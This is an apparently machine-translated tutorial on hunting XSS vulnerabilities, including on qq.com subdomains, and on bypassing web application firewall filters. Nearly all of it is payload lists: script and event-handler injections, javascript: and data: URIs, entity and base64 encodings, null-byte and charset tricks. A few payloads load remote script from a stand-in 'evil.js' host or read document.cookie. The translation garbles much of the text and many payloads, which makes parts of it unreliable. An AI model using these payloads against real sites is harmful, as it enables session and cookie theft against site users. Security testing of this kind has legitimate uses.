An overview of XSS detection experience and techniques and test methods for bypass XSS filtering

The experience and techniques of XSS detection are summarized as follows

1. Find all the sub stations under the qq.com domain

Usually find the method of the sub domain name I choose to use the third party fofa.so and 5118.com Basic find a lot, sometimes idle egg pain also wrote the sub domain name blasting tool, but if not based on word dictionary but a character blasting, this sample is very large, also not too realistic. Therefore, the qq.com of the sub stations constructed in the domain of the CSRF can basically pose a greater threat.

2. Do not miss any one of the input and output

In fact, we can use script to help us complete this, when you select a subdomain, go in, press F12, monitor all HTTP requests! Whether it is get/post, as long as you input the string has output, test it! Whether it is callback or content, all parameters are not spared!

3. All output points

Sometimes you will find that the input parameters are exported to an attribute of the HTML tag, such as value= "input" then consider closing the double quotes, or sometimes it will even appear inside the <script> tag, close, close, and construct your new code!

4. Don't give up in a hurry

The output is in the <script> var xx= ' input ', but single quotes are escaped/slashes? Don't rush to close this page, take a closer look, perhaps a simple%df ' will help you close successfully.

5. Don't trust a bug that's been fixed

The leak was submitted. Wrong, perhaps the safety engineer also repair is not perfect! For example, one of my tpai.qq.com XSS, output in <script>, after the bug was submitted, the engineer fixed the problem, but only filtered (); Three characters. No (); it's really hard to construct complete JavaScript, but have you ever thought about throw "or direct document.write"?

Bypassing WAF for XSS filtering

0x00 background

This article comes from the bypassing XSS filtering section of the modern WEB application firewalls fingerprinting and Filters XSS bypass. The previous test method based on the WAF feature to determine which WAF is skipped, focusing on some of the basic test flow around XSS, although around the WAF, but here or according to WAF in the regular defects to bypass the test method, is not an agreement on the issue, so, The basics can be generalized to other XSS-filtered scenarios. It's easy for beginners to learn some basic ways to test XSS more quickly.

0x01 bypassing blacklist

Most sites use a blacklist to do the filter, and there are three ways to bypass the blacklist test:

1, violence test (input a lot of payload, see return result)

2, according to the regular projection

3, the use of browser bugs

Preliminary test

1 try inserting a more normal HTML tag, such as:<b>,<i>,<u> to see how the return page is, whether it is encoded by HTML, or if the label is filtered.

2 try inserting the closed label, for example: <b,<i,<u,<marquee and then look at the return response and whether the open label is filtered.

3 and then test several XSS payload, basically all XSS filters will be filtered:

<script>alert (1);</script>

<script>prompt (1);</script>

<script>confirm (1);</script>

<scriptsrc= "Http://rhainfosec.com/evil.js" >

See the return response, is all filtered, or only part of the filter, whether left the alert,prompt,confirm characters, and then try the combination of the case:

<script>alert (1);</script>

4 If the filter simply filters out the <script> and </script> labels, you can use

<scr<script>ipt>alert (1) </scr<script>ipt>

Way to bypass, so that when <script> tags are filtered out, the rest of the combination is just forming a complete payload.

5 with <a href tag to test, see return response

<a href= "http://www.google.com" >Clickme</a>

Whether the <a label is filtered whether the href is filtered and whether the data in the href is filtered

If no data is filtered, insert the JavaScript protocol to see:

<a href= "Javascript:alert (1)" >Clickme</a>

Whether the entire protocol content of the error JavaScript is returned is filtered, or only JavaScript characters are tried to try the case conversion

Continue the test event trigger execution javascript:

<a href= "rhainfosec.com" Onmouseover=alert (1) >ClickHere</a>

See if the onmouseover event is filtered. Test an invalid event to see the filtering rule:

<a href= "rhainfosec.com" Onclimbatree=alert (1) >ClickHere</a>

Is it a complete return, or is it the same as the onmouseover was killed.

If it's a complete return, then it means that the blacklist of events is done, but in HTML5 there are more than 150 ways to execute the JavaScript-code event test a very rare event:

<body/onhashchange=alert (1) ><a Href=#>clickit

Test other labels

Next, test the other tags and attributes.

SRC attribute

<video src=x onerror=prompt (1);>

<audio src=x onerror=prompt (1);>

IFRAME Label

<iframe src= "Javascript:alert (2)" >

<iframe/src= "data:text&sol;html;&tab;base64&newline;,pgjvzhkgb25sb2fkpwfszxj0kdeppg==" >

Embed label

<embed/src=//goo.gl/nlX0P>

Action Property

Use the action attribute in the <form,<isindex tab to execute JavaScript

<form action= "Javascript:alert (1)" ><input type=submit>

<isindex action= "Javascript:alert (1)" type=image>

<isindex Action=j&tab;a&tab;vas&tab;c&tab;r&tab;ipt:alert (1) type=image>

<isindex action=data:text/html, type=image>

<formaction= ' Data:text&sol;html,&lt;script&gt;alert (1) &lt/script&gt ' ><button> Click

FormAction Property

<isindexformaction= "Javascript:alert (1)" type=image>

<input type= "image" Formaction=javascript:alert (0) >

<form><button Formaction=javascript&colon;alert (1) >clickme

Background property

<table Background=javascript:alert (1) ></table>//effective on opera 10.5 and IE6

Poster property

<video Poster=javascript:alert (1)//></video>/Opera 10.5 below valid

Data property

<object data= "data:text/html;base64,phnjcmlwdd5hbgvydcgisgvsbg8ikts8l3njcmlwdd4=" >

<object/data=//goo.gl/nlx0p?

Code Property

<applet code= "javascript:confirm (document.cookie);" >//Firefox effective

<embed code= "http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>

Event triggers

<svg/onload=prompt (1);>

<marquee/onstart=confirm (2) >/

<body onload=prompt (1);>

<select Autofocus Onfocus=alert (1) >

<textarea Autofocus Onfocus=alert (1) >

<keygen Autofocus Onfocus=alert (1) >

<video><source onerror= "Javascript:alert (1)" >

The shortest test vector

<q/oncut=open () >

<q/oncut=alert (1) >//is effective at the limit of length

Nesting

<marquee<marquee/onstart=confirm (2) >/onstart=confirm (1) >

<BODYLANGUAGE=VBSONLOAD=ALERT-1//IE8 Effective

<command onmouseover

= "\x6a\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6f\x6c\x6f\x6e\x3b\x63\x6f\x6e\x6 6\x69\x72\x6D\x26\x6C\x70 \x61\x72\x3b\x31\x26\x72\x70\x61\x72\x3b ">Save</command>//ie8 Effective

Filter parentheses in the case of

When the parentheses are filtered, you can use throw to bypass the

<a onmouseover= "Javascript:window.onerror=alert;throw 1>

The above two test vectors in chrome and IE on the above will appear a "uncaught" error, you can use the following vector:

<body/onload=javascript:window.onerror=eval;throw ' =alert\x281\x29 ';>

Expression Property

//IE7 below

<div style= "Color:rgb (' & #0; x:expression (alert (1))" ></div>//IE7 below

<style> #test {x:expression (alert (/xss/))}</style>//IE7 below

Location Property

<a onmouseover=location= ' Javascript:alert (1) ' >click

<body onfocus= "Loaction= ' Javascript:alert (1) '" >123

Some of the other payload

<meta http-equiv= "Refresh" content= "0;url=//goo.gl/nlx0p" >

<meta http-equiv= "Refresh" content= "0;javascript&colon;alert (1)"/>

<svg xmlns= "Http://www.w3.org/2000/svg" ><g onload= "Javascript:\u0061lert (1);" ></g></svg>

<svg xmlns:xlink= "Http://www.w3.org/1999/xlink" ><a><circle r=100/><animate attributename= " Xlink:href "values="; Javascript:alert (1) "begin=" 0s "dur=" 0.1s "fill=" Freeze "/>

<svg><! [cdata[><imagexlink:href= "]]></svg>

<meta content= "&NewLine; 1 &NewLine;; javascript&colon; Alert (1) "http-equiv=" Refresh/>

<math><a xlink:href= "//jsfiddle.net/t846h/" >click

when = (); : When being filtered

<svg><script>alert& #40/1/& #41 </script>//pass Kill all browsers

Opera can not be closed

<svg><script>alert& #40 1& #41/opera can be found

Entity encoding

In many cases, the WAF entity encodes the user's input data,

JavaScript is a very flexible language that can be used in a number of encodings, such as 16, Unicode, and HTML. But there are rules for where these encodings can be used:

Property:

href=

action=

formaction=

location=

on*=

Name=

Background=

Poster=

Src=

Code=

Supported encodings: HTML, octal, decimal, hexadecimal, and Unicode

Property:

Data=

Supported Encodings: Base64

Context-based filtering

The biggest problem with WAF is the fact that the context of the output location is not known and can be bypassed according to the specific circumstances.

Enter in attribute

<input value= "Xsstest" type=text>

Controllable position is xsstest, you can use

">

If < > is filtered, you can replace it with

"Autofocus Onfocus=alert (1)//

There are also a number of other payload:

"onmouseover=" prompt (0) x= "

"Onfocusin=alert (1) autofocusx="

"Onfocusout=alert (1) Autofocus x="

"Onblur=alert (1) autofocusa="

Enter in the script label

For example:

<script>

Var x= "Input";

</script>

Controllable position in input, you can close the script tag insert code, but also we just close double quotes can execute the JS code

"; alert (1)//

The end result is

<script>

Var x= ""; alert (1)//

</script>

Non-conventional event monitoring

For example:

";d Ocument.body.addEventListener (" Domactivate ", alert (1))//

";d Ocument.body.addEventListener (" Domactivate ", Prompt (1))//

";d Ocument.body.addEventListener (" Domactivate ", confirm (1))//

Here are some of the same classes:

Domattrmodified

Domcharacterdatamodified

Domfocusin

Domfocusout

Dommousescroll

domnodeinserted

Domnodeinsertedintodocument

Domnoderemoved

Domnoderemovedfromdocument

Domsubtreemodified

HREF content controllable

For example:

<a href= "Userinput" >Click</a>

Controllable is userinput what we need to do is just type the JavaScript code into it:

Javascript:alert (1)//

The final combination is:

<a href= "Javascript:alert (1)//" >Click</a>

Transform

Using HTML entity URL encoding to bypass the blacklist, href will automatically decode the entity, and if all fails, try to use VBScript below IE10, or use the data protocol.

JavaScript transformations

Examples you can use when using JavaScript protocols:

javascript& #00058; alert (1)

Javascript&colon;alert (1)

Javascript:alert (1)

Javas&tab;cript:\u0061lert (1);

javascript:\u0061lert& #x28;1& #x29

javascript& #x3A;alert&lpar;document&period;cookie&rpar;

VBScript transform

Vbscript:alert (1);

vbscript& #00058; alert (1);

Vbscr&tab;ipt:alert (1) "

Data URl

data:text/html;base64,phnjcmlwdd5hbgvydcgxktwvc2nyaxb0pg==

Json

It's easy to insert XSS code when your input will be displayed in the encodeURIComponent.

encodeURIComponent (' Userinput ')

Userinput at the control, test code:

-alert (1)-

-prompt (1)-

-confirm (1)-

Final Result:

encodeURIComponent ("-alert (1)-")

encodeURIComponent ("-prompt (1)-")

SVG tags

When the results are returned in the SVG tab, there is an attribute

<svg><script>varmyvar= "Yourinput";</script></svg>

Yourinput controllable, input

Www.site.com/test.php?var=text "; alert (1)//

If you put "code some he can still perform:

<svg><script>varmyvar= "text&quot;; Alert (1)//";</script></svg>

Browser bugs

The bug in the character set appears many times in IE, the first is UTF-7, but this is only available in previous versions and now discusses a JavaScript that can be executed in the current browser.

Http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v=XSS

In this page we can control the character set of the current page, when we routinely test:

http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v= ">

Return the result to see that the double quotes are encoded:

<meta charset= "Utf-8" ></meta>

<body>

<input type= "text" value= "&quot;&gt;&lt;img src=x onerror=prompt (0);&gt;" ></input>

</body>

Set the character set to UTF-32:

Http://xsst.sinaapp.com/utf-32-1.php?charset=utf-32&v=%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert (1)% E3%b0%80/script%e3%b8%80

Above this in IE9 and the following version can be executed successfully.

Use 0 bytes to bypass:

<scri%00pt>alert (1);</scri%00pt>

<scri\x00pt>alert (1);</scri%00pt>

<s%00c%00r%00%00ip%00t>confirm (0);</s%00c%00r%00%00ip%00t>

Valid in IE9 and the following versions.

Other and so on a series of browser features XSS can refer to the following articles:

http://drops.wooyun.org/tips/147

0x02 Summary

This article is mainly a test of XSS flow of thought, and did not write all the payload, in fact, no one can write the whole, but a general framework, we are actually looking for the process can be gradually in accordance with this idea to supplement their own payload, presumably, there will be a great progress! ~